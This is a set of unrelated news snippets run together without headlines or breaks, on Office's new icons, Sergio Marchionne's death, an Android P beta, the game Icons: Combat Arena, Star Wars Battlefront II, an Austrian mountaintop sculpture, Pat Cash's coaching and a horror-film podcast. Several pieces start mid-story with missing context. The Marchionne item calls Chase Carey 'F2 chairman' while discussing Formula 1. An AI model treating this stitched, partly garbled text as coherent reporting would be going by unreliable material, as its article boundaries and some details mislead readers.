Microsoft has even made a video to introduce the new icons Microsoft has unveiled a new set of icons that the Office apps will start using. Office 365 customers will see their apps switch to the new icons over the next couple of months, as Microsoft continues to refresh the look and feel of its core productivity suite. The last time the Microsoft Office apps got new icons was 2013, with the same set of icons also used by Office 2016 and the perpetually licensed Office 2019. Since then, Office has got a great deal more mobile with apps for iOS and Android, it gained a bigger Web presence, it added a bunch of collaboration features, and it has seen many of its users switch from the perpetual licenses to the continuously updated Office 365. Top row, from left to right: Outlook, OneDrive, Word, Excel, PowerPoint. Bottom row, from left to right: OneNote, SharePoint, Teams, Yammer, Skype. (credit: Microsoft) The new icons are meant to somehow reflect these changes. The letters adorning each icon have been reduced in size, with the remainder of the space used to show a highly stylized representation of the application. The colors are a bit brighter, too. Oddly, there are already some inconsistencies in the designs; OneDrive doesn’t have a letter at all (it’s just a cloud), and Skype uses the old proportions, with a letter that’s much bigger than any of the others.

Complications arising from surgery on his shoulder had led to the Italian-Canadian being stood down with “profound sorrow” as the head of the Ferrari and Fiat-Chrysler car companies last Saturday.
On Wednesday, the holding company of the Fiat founding family said that Marchionne had passed away.
“Unfortunately, what we feared has come to pass. Sergio Marchionne, man and friend, is gone,” said chairman John Elkann in a statement.
“I believe that the best way to honour his memory is to build on the legacy he left us, continuing to develop the human values of responsibility and openness of which he was the most ardent champion.
“My family and I will be forever grateful for what he has done. Our thoughts are with Manuela, and his sons Alessio and Tyler.”
Marchionne was regarded as one of the most powerful and successful chief executives in the automotive world.
And, after adding the title of Ferrari president to his responsibilities in 2014, he became one of F1’s most influential figures too.
Marchionne joined Fiat in 2004 and five years later oversaw the Italian car maker’s takeover of Chrysler, which saved the American firm from bankruptcy.
He succeeded the long-serving Luca di Montezemolo as Ferrari president in 2014 and in recent seasons F1’s most famous team have returned to title-contending form in a fierce battle with Mercedes.
Speaking in a statement last Saturday, Elkann described Marchionne as someone who “always made a difference”.
“What struck me about Sergio from the very beginning, when we met to talk about the possibility of him coming to work for the Group, even more than his management skills and unusual intelligence, were his human qualities, his generosity and the way he understood people,” said Elkann.
“Over the past 14 years together we have lived through successes and difficulties, internal and external crises, but also unique and unrepeatable moments, both personal and professional. For so many, Sergio has been an enlightened leader and a matchless point of reference.”
Elkann has assumed the role of Ferrari chairman with Louis Camilleri named CEO.
Tributes poured in for Marchionne. F2 chairman Chase Carey said: “We are deeply saddened by the passing of Sergio Marchionne. He was a great leader of not just Formula 1 and the automobile world, but the business world overall.
“He led with great passion, energy and insight, and inspired all around him. His contributions to Formula 1 are immeasurable. He was also a true friend to all of us and he will be deeply missed. At this difficult time we extend our deepest sympathies to his family, friends and colleagues.”
FIA president Jean Todt said: “It is with great sadness that I learned that Sergio Marchionne tragically and unexpectedly passed away. Sergio achieved a colossal amount for the automotive industry and motorsport worldwide. He dedicated himself fully to turn around the Fiat-Chrysler group and put all his energy to bring Scuderia Ferrari back to the top.
“He was an endearing, upstanding and brave man, an unconventional and visionary leader. He was an eminent member of the FIA F1 Strategy Group and of the FIA High-Level Panel for Road Safety. His death is a considerable loss. On behalf of the entire FIA community, all my thoughts go out to his family, his friends and his Ferrari and Fiat-Chrysler group teams”.

The latest Android P Preview (Preview #4, Beta #3) is out. It’s a few days late given that it was supposed to launch in June, but now the Google Pixel 1 and Pixel 2 are free to update to the latest build. This “June” release has been bumped up to the July security patch, and it includes “the latest bug fixes and optimizations for stability and polish” according to Google blog post.
Flash Beta 3 to a device and you’ll find a few changes, mostly related to gesture navigation. Keep in mind it’s still a beta, and while I’m going to point out that things are incomplete, things are allowed to be incomplete. Again, it’s a beta.

We first caught up with Elterman’s work when he published his book Like It Was Yesterday a few years back; these days, happily, he’s joined Instgram, and is sharing more buried treasures from his salad days. Here are a few highlights.

For Wavedash CEO Matt Fairchild and creative director Jason Rice, building a new platform fighter makes more than just business sense: it’s their way of giving back to the games and communities that brought them together.
“I literally owe my entire life — my career, my friends — to this genre. … I owe so much, and I have seen the transformative power that this genre has and its ability to draw in people from across the board and get them into a competitive community and build relationships there,” said Fairchild.
“I have friends all over the world who — growing up as this east-coast, middle-class, white Protestant boy — I would not have made friends with if I had stayed in my little bubble, if gaming hadn’t pulled me out of that and made me more open to new stuff. … But the platform fighting community is where my home was, where my people were at,” Rice added.
The two friends first met more than a decade ago when Rice, who was working at Major League Gaming at the time, hired Fairchild to host Super Smash Bros. tournaments in Texas. Those early experiences were invaluable to them, and now they’re leveraging that expertise for Icons: Combat Arena.
Icons’s gameplay is similar to Super Smash Bros. Players can choose from a number of different characters to fight with, and the goal is to deplete your opponents’ lives by knocking them off the stage. One big difference from Nintendo’s juggernaut series, however, is that Icons will be free-to-play when it comes out on PC (it’s currently in an invite-only closed beta), which will enable it to grow and evolve alongside its players.
It’s the kind of game Wavedash’s founders wish existed 10 years ago. But it wasn’t until a series of industry-wide changes — including the rise of esports, online streaming, and Amazon’s $ 970 million acquisition of Twitch — that Fairchild and Rice finally decided to make their dream a reality.
They recruited other like-minded developers. The team is a mix of triple-A veterans (some coming from big studios like Riot Games and Blizzard) and talented amateurs from the Super Smash Bros. modding community.
“So when we looked at all of these things converging together, we saw an opportunity to take the things that Riot did with League of Legends, the things that Blizzard did with Hearthstone, and more recently, the things that Bluehole has done with PlayerUnknown’s Battlegrounds — to take a genre that’s supported by passionate players and make it accessible and exciting to watch, and then take it to new audiences,” said Rice.
The developers believe that fighting games haven’t had its “League of Legends moment” yet, where a game breaks through the noise to reach mainstream-levels of awareness and success. And they hope Icons can fill that gap. But Wavedash faces several challenges, not the least of which is how do you create a new platform fighter that’s accessible for casual players, yet
deep enough for hardcore fans?

One way that the Oakland, California-based studio is wrestling with that question is through Icons’s design philosophy. It involves three main goals: make the game easy to learn, hard to master, and an endlessly watchable experience. With the first part, Wavedash is staying true to the pick-up-and-play nature that made platform fighters so popular in the first place. You don’t need to master complicated move sets to start having fun in Icons.
But if you do want to dive deeper, the company is planning on adding a series of tutorials that’ll help beginners get comfortable with the more nuanced strategies in the game.
Seasoned platform fighting players will also feel at home in Icons’s world. It has familiar character archetypes or roles, like Kidd the Space Goat (the swift “space animal” archetype) and the empress Zhurong (the beefy “sword fighter” archetype). Wavedash cited Super Smash Bros. Melee as an inspiration for the kind of gameplay depth it wants Icons to have: players are still trying to master the GameCube fighter more than 16 years after its release.
The last goal is perhaps the most difficult one to engineer. The developer won’t really know how Icons fares as a spectator sport until it’s out in the wild. However, the team has seen some positive signs, like the time Fairchild took his fiancée, who hadn’t played a platform fighter before, to an Icons tournament.

Toward the end of the competition, she grew more excited about the matches, and she even started to pick out players to root for based on their play style.
“Building a game that is inherently watchable makes it not only more fun to play, but it also means that it’s super digestible as content for a platform like Twitch or YouTube. And it makes it something that is ‘esports ready,’” said Rice. “Now, we don’t get to decide if our game is an esport or not in the end. The players will. You can host the tournaments, but they have to show up and support you.”
While similarities do exist between Icons and other platform fighters, the team hopes that a mix of new and familiar features will give the game its own identity. One example of bringing something new to the genre is the elemental duo Afi and Galu. They represent what Rice called a duo archetype, where players can switch between them at any time (the inactive partner stays on the stage as a statue).
Both of them share the same basic moves. But they also have their own special attacks: Afi has fire powers and Galu can manipulate water. From private playtesting sessions, Wavedash found that players quickly grew fond of Afi and Galu, not only because of their strategic potential, but also because of their quirky personalities.
“I’m most proud of the work that Jason and the design team — Adam Oliver and Wes Ruttle — did on taking a familiar idea and making it new, and we’re seeing that in the feedback with people that have gotten to beta test Afi and Galu. They say, ‘This is what I wanted from a duo character. This is familiar and yet it’s also unlike any duo character I’ve ever played,’” said
Fairchild.

Gathering community feedback so early in the development process has always been a part of the developers’ plans. Those responses help them identify problems they should work on, as well as which aspects of the Icons’ roster need improvement. Wavedash regularly travels to different gaming events and tournaments — like TwitchCon, EVO (the Evolution Championship Series), and CEO (Community Effort Orlando) — to collect even more data by asking players to fill out surveys (some of who compete in fighting games for a living).
“Ultimately, Wavedash is a small team that’s punching above its weight class. And we’ve only been able to do that because we’ve taken this kind of unorthodox approach to game development. But our players have helped us shape who these characters should be and what the game should feel like,” said Rice.
Of course, the studio can’t react to every individual piece of feedback; it still has a vision it wants to maintain. Rice and his colleagues have to carefully sift through comments (whether good or bad) to see if any of them actually helps reinforce the original design goals.
“Something Jason says a lot is we are in this business to create joy. Our job is to get people together playing games, having fun, and to always be that uniquely positive force in their lives. So as long as we’re going towards that and people are invested in the outcome, then we’re in good shape,” said Fairchild.

Heroes vs. Villains is the ultimate Star Wars fantasy. In this multiplayer mode for Star Wars: Battlefront II, you can be a hero or villain. This is one of the reasons why Battlefront II is probably going to be one of the biggest video games of the year, as it takes that fantasy farther than the original Star Wars: Battlefront did in 2015.
It doesn’t matter which time frame you’re in or where your battle takes place. You can be one of the iconic heroes or villains from the Star Wars movies and then square off in a multiplayer battle of four heroes against four villains. I played the mode at an event at Electronic Arts headquarters in Redwood City as part of a demo of all of the game’s multiplayer modes. The game from EA’s DICE, Motive, and Criterion studios debuts on November 17.
Of all of the modes, this one took the most skill. You had to learn each of the special capabilities for the different characters and then use them at the right time. In the video embedded here, I played as Luke Skywalker, and I was teamed up with Rey, Lando Calrissian, and Han Solo. That was a good mix of blasters and lightsabers. We squared off against Darth Vader, Darth Maul, Kylo Ren, and Boba Fett. It felt a little like the Gunfight at the OK Corral.
Above: Four human players play as heroes and take on four villains in Star Wars: Battlefront II’s Heroes vs. Villains multiplayer mode.
With Luke Skywalker, I could use the bumpers on the controller to tap special abilities. The left bumper was the Force Push ability, which was good for initial contact and, with luck, throwing your enemy off a ledge. The right bumper was for the Force Rush, where you ran fast in a charge at an enemy. Using both bumpers invoked the Force Repulse, which sent all enemies backward with damage.
As I mentioned, in a battle full of heroes and villains, those special abilities get used all the time. I remembered to use those abilities in this fight, but it was hard to get the timing just right.
Electronic Arts’ teams have been working hard on the massive game for the simultaneous launch on the PlayStation 4, Xbox One, and PC. I played it on a PlayStation 4.

While hiking in the peak district of central Austria, a person might expect to gaze upon stunning mountaintop vistas of natural beauty. But one rambler stumbled across an object that certainly isn’t in the tourist guidebook – a giant wooden penis.
The large phallic sculpture was found on a rocky outcrop of the 1,800-meter (5,900ft) high Ötscher mountain. Measuring about 1 meter in height and etched with great detail, the mountaintop penis was discovered by blogger Marika Roth on the Lackenhof trail.
The nature writer posted images of the artwork to social media last Thursday, declaring that the popular Ötscher hiking trail had a new attraction. “I think the ötscher has a new mascot,” Roth wrote on Facebook.
It’s unclear who brought the graphic carving up the mountain. But it’s providing Facebook commenters with the opportunity to discuss the male anatomy and question the rationale behind its placement.

“The Ötscher is a sleeping giant… so someone has opened his pants,” an internet commenter stated. Others have debated whether a penis is better than a crucifix, which also sits on the mountain.
“Better a friendly penis that demonstrates fertility and strength than the fearsome execution of ancient times,” a second person wrote under the images.
Another chimed in: “Penis instead of summit cross… shows just what values some people have.” Whatever people’s view of the piece, Roth said it presented a “fun change” to her normal walk.

A two-time Davis Cup winner for Australia in the 1980s, Cash has been invited to assist the US team at the Fed Cup final in Belarus later this week due to his role as coach of American star Coco Vandeweghe.
Overlooked as an option to captain Australia’s Davis Cup side in retirement, Cash couldn’t resist a jab before joining the traditional enemy. “I get invited along (to Davis Cup), get the courtesy ‘by the way here’s a ticket’ but never an airfare or hotel which is disappointing,” Cash told AAP. “I think the way they treat their ex-players in tennis in general – and Australian tennis is no different – is pretty poor.
“I’ve been in the American camp for I don’t know how many minutes and am already being treated better than the Australians have treated me.” The 1987 Wimbledon champion took on the Vandeweghe coaching role after the French Open in June.
‘I couldn’t have wished for a better player,” Cash said.
“I’ll watch her any day and she is one of the few players on the women’s circuit where you sit down and say, ‘ok, there’s going to be some action here’.” Vandeweghe was at her combustible best in the WTA Elite Trophy final in China on Sunday, blowing a 5-2 first set advantage to fall 7-5 6-1 to Germany’s Julia Goerges.
But her journey to the final was still enough to earn a career-high ranking of 10, with Vandeweghe set to lead the American charge in Belarus. The emotional talent said Cash had helped her improve “everything” in her game. “I think Pat came in at a great time where I was probably at a very low point,” the 25-year-old said.
“The best way to describe it (his role) is a father figure.
“It will be interesting to have him in the female dynamic of the Fed Cup since he was a Davis Cup legend.” Cash is a dual citizen thanks to his American mother and says the US is his “second favourite country”.
“If Australia was playing the US I’d be torn,” he laughed.
Lugosi was a Hungarian immigrant who rose to fame after playing Dracula in Universal’s 1931 adaptation. English actor Karloff frightened audiences as the Monster in Frankenstein. The two actors were frequently paired together in films, but Karloff always seemed to take top billing. A sort of unofficial rivalry ensued. From You Must Remember This:
Bela Lugosi and Boris Karloff were two middle-aged, foreign, struggling actors who became huge stars thanks to Dracula and Frankenstein, the first two of a trend of monster movie hits released by Universal Studios during the 1930s. This season, we’ll discuss their parallel but very different lives and careers. Today, we’ll start by exploring where each man came from, what they were doing before they got to Universal, and why Universal began making monster movies in the first place.
Episode one, “Where the Monsters Came From,” is available now.
